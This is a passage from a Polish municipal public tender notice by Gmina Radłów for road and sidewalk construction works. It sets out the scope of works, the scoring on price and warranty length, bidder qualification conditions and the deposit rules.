nawierzchni. <br/>Łączenie zalać emulsją asfaltową. <br/> Roboty wykończeniowe i towarzyszące - Za obrzeżem wykonać nasyp z ziemi i <br/>wykonać humusowanie i obsianie trawą. Humusowanie i obsianie trawą wykonać <br/>również po stronie lewej porządkując teren po wykonanej kanalizacji. Dokonać <br/>oczyszczenia lewostronnego rowu. <br/> Modernizacja drogi gminnej na dz. nr 1325-9 obręb Radłów w km od 0+231 - 0+322:<br/>-Roboty przygotowawcze<br/>-Nawierzchnia z kostki<br/>-Pobocza<br/>b) Szczegółowy opis i zakres przedmiotu zamówienia określają: <br/> Dokumentacja Projektowa – Załącznik nr 6.2 do SWZ. <br/> STWiORB – Załącznik nr 5.2 do SWZ,<br/>Znak sprawy: PPI.271.3.23<br/> Przedmiar robót (będący częścią Dokumentacji projektowej) – Załącznik <br/>nr 4.2 do SWZ. <br/> Projektowane postanowienia umowy – Załącznik nr 7 do SWZ<br/>W projektowanych postanowieniach umownych przyjęto zasadę wynagrodzenia <br/>ryczałtowego, tak więc wchodzący w skład Dokumentacji projektowej Przedmiarrobót ma również na celu umożliwienie dokonania wyceny poszczególnych <br/>elementów robót. <br/>2) Zamawiający oczekuje od Wykonawcy podania ceny za realizację zamówienia, <br/>jako ceny ryczałtowej, która obejmuje wykonanie wszystkich elementów <br/>zamówienia będących przedmiotem rysunku i tekstu załączników do SWZ, łącznie <br/>z podatkiem VAT obowiązującym w dniu złożenia oferty. <br/>3) Zamawiający żąda przed podpisaniem umowy z wybranym Wykonawcą, <br/>złożenia przez niego uproszczonego Kosztorysu ofertowego, sporządzonego w <br/>oparciu o Dokumentację Projektową, STWiORB oraz ewentualną wizję <br/>lokalną przeprowadzoną przez Wykonawcę. <br/>4) Wykonawca wykona roboty budowlane w oparciu o dokumentację projektową, <br/>zgodnie z warunkami wykonania i odbioru robót określonymi w STWiORB, <br/>z należytą starannością, zgodnie z aktualnie obowiązującymi przepisami, normami <br/>technicznymi, standardami, zasadami sztuki budowlanej, etyką zawodową oraz <br/>warunkami określonymi w dokumentach zamówienia.<br/>5) Do wykonania robót Wykonawca użyje wyłącznie materiałów własnych, <br/>posiadających wymagane atesty i certyfikaty, które będą wymagane przy odbiorze <br/>końcowym robót. Przy doborze materiałów należy kierować się wymaganiami <br/>sprecyzowanymi w dokumentacji technicznej oraz specyfikacji technicznej <br/>wykonania i odbioru robót. <br/>6) W czasie realizacji robót Wykonawca będzie usuwał i składował wszelkie <br/>urządzenia pomocnicze we własnym zakresie i na własny koszt.<br/>7) Wszelkie inne koszty realizacji przedmiotu zamówienia (koszty mediów – energia <br/>elektryczna, woda, opłaty, i inne), konieczne do poniesienia w celu prawidłowego <br/>wykonania zamówienia, do momentu jego bezusterkowego, protokolarnego <br/>przyjęcia przez Zamawiającego poniesie Wykonawca. <br/>8) Wykonawca zapewni do kierowania robotami osoby z uprawnieniami <br/>w specjalnościach niezbędnych do prawidłowego wykonania powierzonego <br/>zadania, w szczególności w specjalności drogowej i będzie w okresie realizacji <br/>prowadził dziennik budowy (jeżeli takowy będzie konieczny) we współpracy z <br/>Inspektorem Nadzoru ustanowionym przez Zamawiającego.<br/>9) Należy zachować szczególną ostrożność i zminimalizować uciążliwości związane <br/>z prowadzonymi pracami gdyż Wykonawca ponosił będzie pełną <br/>odpowiedzialność za szkody oraz następstwa nieszczęśliwych wypadków <br/>pracowników i osób trzecich, a powstałych w związku z prowadzonymi robotami <br/>budowlanymi w okresie od daty protokolarnego przejęcia terenu budowy przez <br/>Wykonawcę do daty końcowego odbioru robót, <br/>10) Wykonawca jest odpowiedzialny za staranne zapoznanie się z dokumentami <br/>zamówienia.<br/>11) Wszystkie wymagania określone w dokumentach zamówienia stanowią <br/>wymagania minimalne i ich spełnienie jest obligatoryjne. Niespełnienie ww. <br/>wymagań minimalnych będzie skutkować odrzuceniem oferty jako niezgodnej <br/>z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>12) Gwarancja i rękojmia<br/>a) Wymagany okres gwarancji na wykonany przedmiot umowy – minimum 36 <br/>miesięcy. <br/>b) Wymagany okres rękojmi na wykonany przedmiot umowy – minimum 36 <br/>miesięcy.Ostateczny termin gwarancji jakości oraz rękojmi zostanie określony w ofercie <br/>Wykonawcy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty w częściach od 1 do 3 zamawiający będzie <br/>kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz <br/>w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp. Opis kryterium oceny Znaczenie (%)<br/>1. Cena 60 punktów<br/>2. Okres gwarancji jakości 40 punktów<br/>Razem 100 punktów<br/>2)Sposób dokonywania oceny:<br/>a) Sposób oceny ofert w kryterium cena:<br/>Pc = (Cbn /Cb) x 60 punktów<br/>Gdzie: Pc - liczba punktów<br/>Cbn - najniższa ze wszystkich ofert cena ofertowa brutto;<br/>Cb - proponowana w danej ofercie cena ofertowa brutto.<br/>b) Sposób oceny ofert w kryterium okres gwarancji jakości (Pg):<br/> Zaoferowanie 36 miesięcy gwarancji – 0 pkt. Zaoferowanie 42 miesięcy gwarancji – 10 pkt. <br/> Zaoferowanie 48 miesięcy gwarancji – 20 pkt. <br/> Zaoferowanie 54 miesięcy gwarancji – 30 pkt. <br/> Zaoferowanie 60 miesięcy gwarancji – 40 pkt. <br/>Zamawiający informuje, iż za najdłuższy realny okres gwarancji jakości przyjmuje okres <br/>60miesięcy. <br/>Minimalny natomiastwymagany przez Zamawiającego okres gwarancji wynosi 36 miesięcy. <br/>c) Całkowita „Liczba punktów”, zostanie obliczona w następujący sposób:<br/>Lp = Pc + Pg, gdzie:<br/>Lp - całkowita liczba punktów uzyskanych przez ofertę<br/>Pc - liczba punktów uzyskanych w kryterium cena <br/>Pg - liczba punktów uzyskanych w kryterium okres gwarancji.<br/>3) Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>4) Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy <br/>najkorzystniejszą ofertę</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Cześć 3 pn. „Budowa chodnika w ciągu drogi powiatowej nr 1419K w <br/>miejscowości Wola Radłowska Etap II w km 9+885-9+935 ” <br/>a) Przedmiot zamówienia obejmuje realizację następującego zakresu robót:<br/> Roboty pomiarowe, obsługa geodezyjna <br/> Odwodnienie – wody opadowe po stronie prawej z jezdni i chodnika zostaną <br/>zebrane do ścieku przykrawężnikowego wykonanego z kostki betonowej, <br/>następnie spłyną do wpustów ulicznych posadowionych na studzienkach <br/>wodno-ściekowych z osadnikiem i poprzez przykanaliki zostaną wprowadzone <br/>do studni rewizyjnych wybudowanych na kanale. <br/> Zjazdy - Po wykonanym korytowaniu wykonać podbudowę pomocniczą z <br/>kruszywa łamanego grubości 30 cm następnie podbudowę zasadniczą z <br/>mieszanki kruszywa łamanego grubości 20 cm. Po wykonaniu podsypki <br/>cementowo-piaskowej grubości 3 cm ułożyć nawierzchnię zjazdu z kostki <br/>betonowej wibroprasowanej czerwonej grubości 8 cm. <br/> Krawężniki i obrzeża - Na wykonanej ławie betonowej z oporem ułożyć <br/>obrzeża wibroprasowane 8*30 oraz krawężniki 15*30 a na wjazdach <br/>krawężniki najazdowe i skośne. <br/> Chodnik - Po wykonanym korytowaniu wykonać podbudowę pomocniczą z <br/>kruszywa łamanego grubości 20 cm następnie podbudowę zasadniczą z <br/>mieszanki kruszywa łamanego grubości 15 cm. Po wykonaniu podsypki <br/>cementowo-piaskowej grubości 3 cm ułożyć nawierzchnię chodnika z kostki <br/>betonowej wibroprasowanej szarej grubości 6 cm. <br/> Poszerzenie jezdni - Wykonać koryto pod poszerzenie jezdni i pod ściek <br/>przykrawężnikowy. Wykonać podbudowę pomocniczą z mieszanki kruszywa <br/>łamanego grubości 30 cm, następnie podbudowę zasadniczą z mieszanki <br/>kruszywa łamanego grubości 26 cm, warstwę wiążącą AC16W grubości 5 cm, <br/>warstwę ścieralna AC11S grubości 4 cm ułożyć również na sfrezowanej części <br/>istniejącej nawierzchni. Łączenie zalać emulsją asfaltową. <br/> Roboty wykończeniowe i towarzyszące - Za obrzeżem wykonać nasyp z ziemi <br/>i wykonać humusowanie i obsianie trawą. Humusowanie i obsianie trawą <br/>wykonać również po stronie lewej porządkując teren po wykonanej kanalizacji. <br/>Dokonać oczyszczenia lewostronnego rowu. <br/>b) Szczegółowy opis i zakres przedmiotu zamówienia określają: <br/> Dokumentacja Projektowa – Załącznik nr 6.3 do SWZ. <br/> STWiORB – Załącznik nr 5.3 do SWZ,  Przedmiar robót (będący częścią Dokumentacji projektowej) – Załącznik <br/>nr 4.3 do SWZ. <br/> Projektowane postanowienia umowy – Załącznik nr 7 do SWZ<br/>Pozostałe warunki udziału wspólne dla wszystkich części :<br/>1) W projektowanych postanowieniach umownych przyjęto zasadę wynagrodzenia <br/>ryczałtowego, tak więc wchodzący w skład Dokumentacji projektowej Przedmiar robót ma również na celu umożliwienie dokonania wyceny poszczególnych <br/>elementów robót. <br/>2) Zamawiający oczekuje od Wykonawcy podania ceny za realizację zamówienia, <br/>jako ceny ryczałtowej, która obejmuje wykonanie wszystkich elementów <br/>zamówienia będących przedmiotem rysunku i tekstu załączników do SWZ, łącznie <br/>z podatkiem VAT obowiązującym w dniu złożenia oferty. <br/>3) Zamawiający żąda przed podpisaniem umowy z wybranym Wykonawcą, <br/>złożenia przez niego uproszczonego Kosztorysu ofertowego, sporządzonego w <br/>oparciu o Dokumentację Projektową, STWiORB oraz ewentualną wizję <br/>lokalną przeprowadzoną przez Wykonawcę. <br/>4) Wykonawca wykona roboty budowlane w oparciu o dokumentację projektową, <br/>zgodnie z warunkami wykonania i odbioru robót określonymi w STWiORB, <br/>z należytą starannością, zgodnie z aktualnie obowiązującymi przepisami, normami <br/>technicznymi, standardami, zasadami sztuki budowlanej, etyką zawodową oraz <br/>warunkami określonymi w dokumentach zamówienia.<br/>5) Do wykonania robót Wykonawca użyje wyłącznie materiałów własnych, <br/>posiadających wymagane atesty i certyfikaty, które będą wymagane przy odbiorze <br/>końcowym robót. Przy doborze materiałów należy kierować się wymaganiami <br/>sprecyzowanymi w dokumentacji technicznej oraz specyfikacji technicznej <br/>wykonania i odbioru robót. <br/>6) W czasie realizacji robót Wykonawca będzie usuwał i składował wszelkie <br/>urządzenia pomocnicze we własnym zakresie i na własny koszt.<br/>7) Wszelkie inne koszty realizacji przedmiotu zamówienia (koszty mediów – energia <br/>elektryczna, woda, opłaty, i inne), konieczne do poniesienia w celu prawidłowego <br/>wykonania zamówienia, do momentu jego bezusterkowego, protokolarnego <br/>przyjęcia przez Zamawiającego poniesie Wykonawca. <br/>8) Wykonawca zapewni do kierowania robotami osoby z uprawnieniami <br/>w specjalnościach niezbędnych do prawidłowego wykonania powierzonego <br/>zadania, w szczególności w specjalności drogowej i będzie w okresie realizacji <br/>prowadził dziennik budowy (jeżeli takowy będzie konieczny) we współpracy z <br/>Inspektorem Nadzoru ustanowionym przez Zamawiającego.<br/>9) Należy zachować szczególną ostrożność i zminimalizować uciążliwości związane <br/>z prowadzonymi pracami gdyż Wykonawca ponosił będzie pełną <br/>odpowiedzialność za szkody oraz następstwa nieszczęśliwych wypadków <br/>pracowników i osób trzecich, a powstałych w związku z prowadzonymi robotami <br/>budowlanymi w okresie od daty protokolarnego przejęcia terenu budowy przez <br/>Wykonawcę do daty końcowego odbioru robót, <br/>10) Wykonawca jest odpowiedzialny za staranne zapoznanie się z dokumentami <br/>zamówienia.<br/>11) Wszystkie wymagania określone w dokumentach zamówienia stanowią <br/>wymagania minimalne i ich spełnienie jest obligatoryjne. Niespełnienie ww. <br/>wymagań minimalnych będzie skutkować odrzuceniem oferty jako niezgodnej <br/>z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>12) Gwarancja i rękojmia<br/>a) Wymagany okres gwarancji na wykonany przedmiot umowy – minimum 36 <br/>miesięcy. <br/>b) Wymagany okres rękojmi na wykonany przedmiot umowy – minimum 36 <br/>miesięcy. Ostateczny termin gwarancji jakości oraz rękojmi zostanie określony w ofercie <br/>Wykonawcy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty w częściach od 1 do 3 zamawiający będzie <br/>kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz <br/>w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp. Opis kryterium oceny Znaczenie (%)<br/>1. Cena 60 punktów<br/>2. Okres gwarancji jakości 40 punktów<br/>Razem 100 punktów<br/>2)Sposób dokonywania oceny:<br/>a) Sposób oceny ofert w kryterium cena:<br/>Pc = (Cbn /Cb) x 60 punktów<br/>Gdzie: Pc - liczba punktów<br/>Cbn - najniższa ze wszystkich ofert cena ofertowa brutto;<br/>Cb - proponowana w danej ofercie cena ofertowa brutto.<br/>b) Sposób oceny ofert w kryterium okres gwarancji jakości (Pg):<br/> Zaoferowanie 36 miesięcy gwarancji – 0 pkt. Zaoferowanie 42 miesięcy gwarancji – 10 pkt. <br/> Zaoferowanie 48 miesięcy gwarancji – 20 pkt. <br/> Zaoferowanie 54 miesięcy gwarancji – 30 pkt. <br/> Zaoferowanie 60 miesięcy gwarancji – 40 pkt. <br/>Zamawiający informuje, iż za najdłuższy realny okres gwarancji jakości przyjmuje okres <br/>60miesięcy. <br/>Minimalny natomiastwymagany przez Zamawiającego okres gwarancji wynosi 36 miesięcy. <br/>c) Całkowita „Liczba punktów”, zostanie obliczona w następujący sposób:<br/>Lp = Pc + Pg, gdzie:<br/>Lp - całkowita liczba punktów uzyskanych przez ofertę<br/>Pc - liczba punktów uzyskanych w kryterium cena <br/>Pg - liczba punktów uzyskanych w kryterium okres gwarancji.<br/>3) Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>4) Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy <br/>najkorzystniejszą ofertę</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunek/warunki udziału w <br/>postępowaniu dotyczące:<br/>1) sytuacji ekonomicznej lub finansowej:<br/>1.1.Część 1: <br/>Zamawiający uzna, że wykonawca spełnia warunek w/w zakresie jeżeli: wykaże, że jest <br/>ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności <br/>związanej z przedmiotem zamówienia, na sumę gwarancyjną co najmniej 1.000.000,00 zł <br/>(słownie: jeden milion złotych )<br/>1.2.Część 2: <br/>Zamawiający uzna, że wykonawca spełnia warunek w/w zakresie jeżeli: wykaże, że jest <br/>ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności <br/>związanej z przedmiotem zamówienia, na sumę gwarancyjną co najmniej 400.000,00 zł <br/>(słownie: czterysta tysięcy złotych )<br/>1.3.Część 3: <br/>Zamawiający nie wyznacza szczegółowego warunku dla tej części postępowania <br/>INFORMACJE DLA WSZYSTKICH CZĘŚCI <br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej <br/>Wykonawców warunek zostanie uznany za spełniony, jeżeli co najmniej 1 z wykonawców <br/>lub wszyscy łącznie wykażą, że spełniają w/w opisany warunek. <br/>Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z <br/>wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę <br/>poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba <br/>że za nieudostępnienie zasobów podmiot ten nie ponosi winy.<br/>2) zdolności technicznej lub zawodowej:<br/>1.1. Część 1:<br/>Zamawiający uzna, że wykonawca spełnia warunek w/w zakresie jeżeli wykaże, że wykonał <br/>w sposób należyty, zgodnie z przepisami prawa budowlanego i prawidłowo ukończył, nie <br/>wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres <br/>prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 robotę budowlaną <br/>polegającą na budowie, przebudowie lub remoncie drogi lub dróg o nawierzchni asfaltowej, <br/>której wartość wyniosła co najmniej 1.000.000,00 zł brutto (słownie: jeden milion złotych).<br/>1.2.Część 2: <br/>Zamawiający uzna, że wykonawca spełnia warunek w/w zakresie jeżeli wykaże, że wykonał <br/>w sposób należyty, zgodnie z przepisami prawa budowlanego i prawidłowo ukończył, nie <br/>wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres <br/>prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 robotę budowlaną <br/>polegającą na budowie, przebudowie lub remoncie chodnika lub placu lub drogi o <br/>nawierzchni z kostki brukowej lub betonowej lub płytek betonowych, których łączna<br/>wartość wyniosła co najmniej 400.000,00 zł brutto (słownie czterysta tysięcy brutto) <br/>1.3.Część 3: <br/>Zamawiający uzna, że wykonawca spełnia warunek w/w zakresie jeżeli wykaże, że wykonał w sposób należyty, zgodnie z przepisami prawa budowlanego i prawidłowo ukończył, nie <br/>wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres <br/>prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 robotę budowlaną <br/>polegającą nabudowie, przebudowie lub remoncie chodnika lub placu lub drogi o <br/>nawierzchni z kostki brukowej lub betonowej lub płytek betonowych, których łączna <br/>wartość wyniosła co najmniej 30.000,00 zł brutto (słownie trzydzieści tysięcy brutto) <br/>INFORMACJE DLA WSZYSTKICH CZĘŚCI <br/>Odnośnie do wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą oni <br/>polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do <br/>realizacji których te zdolności są wymagane.<br/>W takim przypadku Wykonawcy składają oświadczenie, określone w art. 117 ust. 4 ustawy <br/>Pzp, którego wzór określony został w Załączniku nr 10 do SWZ.<br/>W przypadku posługiwania się przez wykonawcę cudzym potencjałem, wykonawcy mogą <br/>polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają <br/>roboty budowlane, do realizacji których te zdolności są wymagane.<br/>Formularz wykaz robót stanowi Załącznik nr 11 do SWZ i jest składany na wezwanie <br/>Zamawiającego <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty <br/>wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym <br/>terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych <br/>środków dowodowych:W zakresie potwierdzenia braku podstaw do wykluczenia:<br/> oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu <br/>złożonym na podstawie art. 125 ust. 1 Pzp, w zakresie podstaw wykluczenia <br/>z postępowania wskazanych przez Zamawiającego, o których mowa w: <br/>a) art. 108 ust. 1 pkt. ustawy Pzp, <br/>b) w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 roku o szczególnych <br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego którego wzór stanowi Załącznik <br/>nr 8 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty <br/>wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym <br/>terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych <br/>środków dowodowych:<br/>a) W zakresie potwierdzenia spełniania warunków udziału w postępowaniu:<br/> wykazu robót budowlanych wykonanych nie wcześniej niż w okresie <br/>ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres <br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich<br/>wartości, przedmiotu, dat wykonania i podmiotów, na rzecz, których roboty <br/>budowlane zostały wykonane, oraz załączeniem dowodów określających czy te <br/>roboty budowlane zostały wykonane należycie, zgodnie z przepisami prawa <br/>budowlanego i prawidłowo ukończone, przy czym dowodami, o których <br/>mowa, są referencje bądź inne dokumenty wystawione przezpodmiot, na rzecz, <br/>którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej <br/>przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać <br/>tych dokumentów – inne dokumenty, zgodnie z wymogiem określonym w <br/>Rozdziale II ust. 7 pkt. 1) SWZ. – Załącznik nr 11 do SWZ<br/> dokumentu potwierdzającego, że wykonawca jest ubezpieczony od <br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z <br/>przedmiotem zamówienia na sumę gwarancyjną określoną przez <br/>zamawiającego, w Rozdziale II ust. 7 pkt. 2) SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu <br/>składania ofert, wnieść wadium w kwocie:<br/>a) cześć 1: 10.000,00 zł<br/>b) część 2: 5.000,00zł<br/>c) cześć 3: Zamawiający nie wymaga wniesienia wadium dla tej części.<br/>2) Wadium musi obejmować pełen okres związania ofertą, tj. do dnia 09.03.2023 r.. <br/>3) Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 <br/>ustawy Pzp.<br/>4) Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy <br/>w banku w Banku Spółdzielczym Rzemiosła Oddział Radłów Nr <br/>10858900060240000000260004 z dopiskiem “wpłata wadium – sprawa nr PPI.271.3.23 <br/>– część nr….”. <br/>5) Wadium musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed <br/>upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy <br/>zamawiającego).<br/>6) Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w <br/>oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem <br/>elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy:<br/>- nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), <br/>gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym w <br/>gwarancji lub poręczeniu musi być Gmina Radłów z siedzibą ul. Kolejowa 7, 33-130 <br/>Radłów<br/>- określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>- kwotę gwarancji/poręczenia,<br/>- termin ważności gwarancji/poręczenia,<br/>- zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na <br/>pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 <br/>ustawy Pzp.<br/>7) W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy <br/>lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył <br/>wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, <br/>zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>8) Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy <br/>Pzp.<br/>9) Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy <br/>Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem. Oświadczenie potwierdzające brak podstaw do wykluczenia wykonawcy oraz spełnienie warunków udziału w postępowaniu składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Odnośnie do wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą oni polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>W takim przypadku Wykonawcy składają oświadczenie, określone w art. 117 ust. 4 ustawy Pzp, którego wzór określony został w Załączniku nr 10 do SWZ. Pozostałe wymagania określają dokumenty zmaówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - 